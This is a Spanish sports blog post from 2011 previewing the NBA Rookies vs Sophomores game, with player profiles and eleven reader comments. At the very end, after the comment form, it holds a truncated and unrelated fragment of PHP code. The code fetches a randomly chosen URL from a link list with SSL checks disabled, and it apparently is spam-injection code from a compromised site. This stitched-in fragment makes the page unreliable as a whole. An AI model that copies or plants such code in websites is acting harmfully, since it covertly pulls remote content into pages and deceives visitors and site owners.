Los Angeles 2011: Rookies vs Sophomores

02 de February de 2011 por Hynreck

No tiene tanto glamour ni despierta tanta expectación como el All-Star de los mayores, pero el Rookies contra Sophomores suele ser a priori interesante porque nos permite comparar una hornada con otra. Decimos interesante a priori, porque realmente el partido suele ser un tostón, un correcalles sin sentido donde únicamente se busca el lucimiento personal y acaba siendo básicamente un concurso de mates y triples sin oposición.

De todas maneras no deja de ser una pequeña humillación que unos recién llegados puedan vencer a jugadores un año más hechos y con más experiencia en la liga, como ocurrió el año pasado, así que el equipo sophomore suele cargar con un poco más de presión y con el cartel de favorito (sí, hay que buscar el interés en algún lado).

Por los jugadores de segundo año los elegidos han sido:

Tyreke Evans (Kings): Su temporada está siendo algo “decepcionante”. Decepcionante entrecomillado porque unos números de 18-5-5 para un jugador de 21 años, siendo el líder de su equipo, son tremendos, pero no podemos olvidar que en su temporada rookie el chiquillo hizo 20-5-5 (anteriormente sólo lo habían conseguido unos “mindundis” como Oscar Robertson, Michael Jordan y LeBron James). Además,  su equipo parece haber dado un paso atrás bajo su mando.

Stephen Curry (Warriors): Si no ocurre nada raro, será All-Star en un futuro. Crecimiento lento (también debido a su gran temporada rookie) pero constante. Su indefinición entre los puestos de PG y SG jugaba en su contra pero se ha adaptado bien al puesto de base, aunque le falta mejorar en la distribución de juego. Tiene tiempo y ninguna presión en su equipo para conseguirlo.

Brandon Jennings (Bucks): Las lesiones no le han dejado rendir esta temporada como debe y los Bucks lo han notado. Después de estar un mes de baja, poco a poco está volviendo a disfrutar de minutos. Si los Bucks aspiran a estar en postemporada dependen bastante de su salud.

DeMar DeRozan (Raptors): Se ha hecho con el puesto en Toronto. Ha evolucionado mucho este año y es la segunda opción ofensiva de su equipo. Se le nombraba como jugador de gran potencial y parece dispuesto a disipar las dudas.

Jrue Holiday (Sixers): El jugador más joven de su promoción no ha tenido tiempo para aprender. En un equipo necesitado tuvo que tomar pronto las riendas del mismo. Con los defectos propios de su edad se está convirtiendo en un jugador a tener muy en cuenta. Debe mejorar tanto en defensa como las pérdidas de balón y la selección de tiro, pero aún así es capaz de acercarse a menudo al triple doble. Una joya robaron el año pasado en Philly.

Wesley Matthews (Blazers): No seremos tan osados como para decir que ha hecho olvidar a Brandon Roy pero este chico no para de sorprendernos. Siendo un undrafted se ganó un puesto de importancia en los Jazz  gracias a su entrega en defensa. Como FA firmó con los Blazers y con la lesión de Roy se le exigió un mayor aporte ofensivo que también lo está dando. En Salt Lake City  empiezan a ver  que se equivocaron al no retenerlo…

Serge Ibaka (Thunder): El chico llegó a España jovencísimo y se le veía un gran potencial. En Oklahoma le tienen como el secreto mejor guardado y dan palmas con las orejas viendo hasta dónde puede llegar. Ágil y atlético como pocos, gran taponador y buen reboteador, si consigue desarrollar un buen tiro a media distancia y algo de masa corporal será muy difícil de parar.

DaJuan Blair (Spurs): San Antonio se mueve de maravilla con las segundas rondas y los últimos puestos de las primeras, y para muestra un botón. Blair se ha hecho con el puesto de C titular. Sus números no están siendo espectaculares  y su altura lo limita en demasía para el puesto, pero él responde a las exigencias con creces.  Tal vez nunca sea una estrella, pero es un gran complemento para un equipo de Playoffs.

Taj Gibson (Bulls): Tal vez la elección más discutida. Tras una gran campaña como novato, la llegada de Carlos Boozer lo ha relegado al banquillo y ha disminuido drásticamente sus minutos y sus números. La falta de jugadores interiores de calidad entre sus  coetáneos le ha dado la plaza.

Los ausentes:

Podemos destacar en este grupo a gente como Tyler Hansbrough, que empieza a disfrutar de minutos de calidad en Indiana, Jodie Meeks, que se ha destapado como un gran triplista en un equipo necesitado de tiradores como los Sixers, Omri Casspi, que se cae del equipo del año pasado, Johnny Flynn, que tras su lesión intenta volver a hacerse con la titularidad en los Wolves, Austin Daye, que por su parte empieza a dejar entrever su inmenso futuro en los Pistons,  Ty Lawson, que sigue aprendiendo del maestro Billups y que puede que pronto se haga cargo del equipo, o James Harden, quien no termina de explotar en un equipo plagado de calidad como los Thunder. Pero queremos detenernos en un nombre sobre todos: Es Darren Collison, muy buen director de juego, con un tiro a distancia más que consistente, y que probablemente ha hecho más que merecimientos para estar en éste partido. La superpoblación de bases ha jugado en su contra. Seguro que será el primer sustituto si hay alguna baja.

Por su parte, los rookies partirán con:

Blake Griffin (Clippers): No se hagan ilusiones, es poco probable que acuda a este partido. Su lugar está con los mayores. Desde Duncan ningún rookie ha jugado el partido de las estrellas pero sin duda Griffin lo merece. No nos quemaríamos si poniendo la mano en el fuego dijésemos que en su primera temporada como profesional ya le vemos como un futuro hall-of-famer. Sus números son estrepitosos: 23-13-4. No podemos decir más. Es una bestia. Su reto: cambiar la dinámica perdedora de los Clippers.

John Wall (Wizards): Maldice el día en que Griffin se lesionó y retrasó un año su debut en la NBA. Si no, sería el máximo favorito a hacerse con el ROY. Sus números 15-4-9 están muy bien, y aunque está teniendo problemas con las lesiones, se le ve con la suficiente personalidad como para guiar a su equipo  a hacer cosas interesantes en un futuro no muy lejano. El base del futuro: alto, rápido, fuerte, atlético, con  tiro exterior y mortal cuando ataca la canasta. Físicamente inmejorable. Como “pero”, debería cuidar un poco más las pérdidas de balón.

DeMarcus Cousins (Kings): Llegó con fama de polémico y de no tener la cabeza demasiado centrada. Ha desplazado a Dalembert  (gracias a Dios) del puesto de center titular en Sacramento, y, centrado, demuestra ser uno de los mejores pívots de futuro en toda la liga. Gran adquisición de los Kings.

Landry Fields (Knicks): No lo dijimos pero ya sabíamos que sería el gran robo del draft (no, mentira. Ni lo sabíamos ni nos lo imaginábamos siquiera remotamente). Este chico llegó a la Gran Manzana sin hacer ningún ruido y se ha hecho fuerte como escolta titular. Buen defensor con una gran altura para el puesto, consistente tirador exterior y tremendo bajando rebotes. De momento la gran sorpresa del curso.

Derrick Favors (Nets): Tanto su aportación como sus minutos en la cancha no están siendo los esperados. Tiene un gran margen de progresión. Con unas condiciones físicas envidiables, su inexperiencia tiende a cargarle de faltas demasiado pronto, mientras que su repertorio ofensivo sigue siendo algo limitado. Se espera mucho más de él.

Wesley Johnson (Timberwolves): También algo decepcionante el arranque de temporada del ex-orange. Se esperaba un jugador completamente hecho debido a su edad (cuenta ya con 23 años) y que aportase desde el primer momento. Tras empezar la temporada como titular, parece que  Corey Brewer le está comiendo la tostada. Si bien sus porcentajes de tiro no son malos, se espera que asuma mayores responsabilidades.

Greg Monroe (Pistons): ¿Por qué no juega más minutos Monroe? Esa era la gran pregunta hace 2 meses en Detroit. Ya ha desplazado a Big Ben al banquillo y se ve ante un futuro esperanzador en una franquicia en reconstrucción donde crecer sin presión. En Oakland se decantaron por Udoh. ¿Se arrepentirán?

Eric Bledsoe (Clippers): Vale, sus números no son llamativos. Su nivel no debería ser como para estar en este partido pero al revés de lo que ocurre con los PG’s en el equipo de los sophomores, en el de los rookies hay una clara carencia de ellos. El suplente de Wall en Kentucky ha dado buenos minutos como sustituto y como suplente de Baron Davis en los Clippers  y seguramente en un futuro pueda disputarle el puesto. De momento con ir aprendiendo tiene bastante.

Gary Neal (Spurs): Quién se lo iba a decir al bueno de Neal. Tras pasar por la ACB, por la LEGA y otra vez por la ACB, resulta que te llega la oportunidad con 26 años de hacer las ligas de verano y te ganas un contrato con los Spurs. Y no sólo eso, sino que aparte de debutar en la NBA, tienes una aportación importante en el juego de tu equipo, un equipo puntero además. El sueño americano. Nos alegramos por él.

Los ausentes:

Aquí también los tenemos, empezando por Paul George, en el cual piensan en los Pacers como el perfecto recambio de Granger, “Farruquito” Aminu, quien  últimamente se ve envuelto en rumores de traspaso con los Sixers, Xavier Henry, gran defensor que durante un tiempo ha estado saliendo de inicio en los Gizzlies desplazando a Mayo al banquillo, aunque últimamente se ha visto relegado por Sam Young, o Ed Davis que está aprovechando los minutos y la carencia de jugadores interiores de calidad en los Raptors. El gran ausente aquí sin embargo es Evan Turner, pero esta vez por deméritos propios. Su adaptación a la liga está siendo difícil, y si bien poco a poco está rindiendo mejor, su temporada está siendo decepcionante. Sus porcentajes en el tiro están siendo muy bajos, se está viendo superado por la fuerza y la velocidad de la liga y le está costando encontrar su lugar. Sabíamos que necesita el balón en sus manos, puesto que en esencia es un escolta-alero falso ya que en su última temporada en Ohio ejercía de base. Como director de juego es un Nº 2 del draft. Como 2-3 es un jugador de complemento. Como es más que probable que Griffin no acuda, su puesto debería ser para Turner o para Davis, aunque quizás Davis parta con ventaja debido a su posición.

Con estos mimbres se presenta el partido, que servirá para descubrirnos alguno de los futuros talentos de la liga. La experiencia también nos dice que alguno de ellos acabará jugando en Europa (¿vieron el triple de Khalid El Amin la semana pasada en la Euroliga?) o incluso ocupando papeles marginales en la NBA, y que alguno que no está presente ni entra en las quinielas, evolucionará lo suficiente como para ser en el futuro mejor que muchos de los presentes. Este partido puede ser un trampolín o el canto del cisne para algunos. Esperemos que, contra pronóstico, podamos disfrutar de un buen espectáculo como aperitivo del All-Stars de verdad.

Imágenes | Ap Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Denise dice:
    #1

    Buen articulo Hynreck.
    Sinceramente, espero que la NBA suprima esta pachangita por algo mas interesante. Creo recordar que el ultimo rookie vs sophomores que vi fue el de Garbajosa….y en diferido tras haberlo dejado grabando la noche anterior. Ya no soy capaz de tragarmelo ni a las 12 de la mañana tranquilamente.
    No compares a Aminu con la basura con la que la has comparado, pobre Aminu, o es que este tambien ha matado a alguien y yo no lo sé….

      Citar

  2. Hynreck dice:
    #2

    No hombre, lo de Farruquito es por el parecido fonético de nombre, Al-Farouq, no por ninguna otra cosa, ni para alterar a nadie.
    Yo no veo mal que exista este partido, pero deberían hacer algo para amentar la competitividad en él. Pero esto vale tambien para el All-Star game, tambien es un tostón.

      Citar

  3. Txusma dice:
    #3

    La competitividad de los partidos del All Stars solo puede aumentar si los jugadores ponen algo de su parte. No puedes poner una pistola en el pecho a nadie.

      Citar

  4. Hynreck dice:
    #4

    Es verdad Txus, sin embargo yo siempre he pensado en un EEUU contra el resto del mundo, no se, algo que pueda crear rivalidad, o sino dar algún premio más goloso… Bah, la verdad que tampoco tengo ninguna solución mínimamente interesante (aunque oye, lo de la pistola…)

      Citar

  5. Sancho88 dice:
    #5

    Me parece muy injusto que se diga de Jennings que las lesiones no le han permitido rendir a su nivel, y sin embargo de Tyreke se diga que es una “decepción” y que ha dado un paso atrás, cuando lleva jugando toda la temporada con fascitis plantar y ni siquiera dirige él al equipo, sino que lo hacen Udrih, un base tirador que pasa bastante poco, y Pooh Jeter.

      Citar

  6. kantonyo dice:
    #6

    Felicidades Hynreck, un analisis muy completo.

    La verdad que a mi me han decepcionado bastante Wesley Johnson al que le veo muy timido en la pista, Evan Turner que ha estado muy flojo aunque ha mejorado un poquito como dice Hinreck, y el desaparecido Cole Aldrich que ni siquiera en la NBDL está sobresaliendo…

    Por otra parte sigo pidiendo más minutos para Austin Daye, Hansbrough y Budinger en los sophomores y en los novatos Greivis Vasquez, Patterson o Ekpe Udoh. Tengo confianza en ellos a pesar de lo poco que juegan.

    Ed Davis tenía que haber ido sin duda a este partido.

      Citar

  7. Sancho88 dice:
    #7

    5:29 de la mañana. Blake Griffin acaba de volar por los aires para meter un alley-hoop impresionante en contraataque a pase de Bledsoe, me parece. Lo de este chico contradice todas las leyes de la naturaleza. Con 21 años, ¿de dónde saca ese físico portentoso?

    Ya veréis la jugada, no tiene desperdicio. Dicho esto, el partido en realidad lo tienen muy complicado los Clippers, ya que Chicago está encontrando dentro a Carlos Boozer y no encuentran la manera de pararlo

      Citar

  8. Txusma dice:
    #8

    Va a ser esta: http://www.nba.com/video/games/clippers/2011/02/02/0021000729_chi_lac_play4.nba/

    Me hace gracia como la pasa Bledsoe. Debe pensar: “La tiro por ahí que ponga donde la ponga llegará el animalico…”

      Citar

  9. portu dice:
    #9

    Parece q es Foye quien tira el melón a Griffin, Txus…
    Yo venía a defender a Curry, al cual le afectan únicamente sus limitaciones físicas, y más en defensa q en ataque… en la NBA siempre ha jugado de PG, no creo q hayan existido dudas por parte de los Warriors y no las ha transmitido él jugando, ni siquiera creo q tenga limitaciones en la distribución del balón, eso sí, parar a los Deron, Rose, etc, eso es directamente imposible para él. Su año ha ido de menos a más, tb condicionado por 2 lesiones de tobillo q le hicieron perderse partidos.
    De otros rookies me ha dejado a cuadros lo de C. Aldrich, se movieron mucho para conseguirlo, además ya venían de una cagada previa similar como B. Mullens, y este parece incluso peor.
    Lo de E. Turner no sé si es tan preocupante, quizás sí para quien esperase el nivel de un B. Roy sano, pero podría tener una evolución lenta y necesita titularidad. Yo le veo algo tímido en el juego, es rarísimo q un escolta en la NBA pase el balón sin atacar antes el aro, y las veces q lo he visto lo hace, no sé si juega realmente así o es algo de falta de confianza.

      Citar

  10. Txusma dice:
    #10

    Cierto, es Randy Foye.
    Lo de Cole Aldrich es un poco expediente-X. Tan malo como para no destacar ni en la NBDL no parecía…

      Citar

  11. Sancho88 dice:
    #11

    correcto Portu, era Foye, pero todo pixelado a las cinco de la mñanaa… jejeje, no pude distinguirlo. luego lo vi en el play by play y constaté que era él el del pase, que es lo que dice Txusma, puso el balon en algun lugar no muy específico, casi sin calibrar el asunto y apareció el animalico saltando por los aires. pero es que es espectacular maxo!1 que jodido animal.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>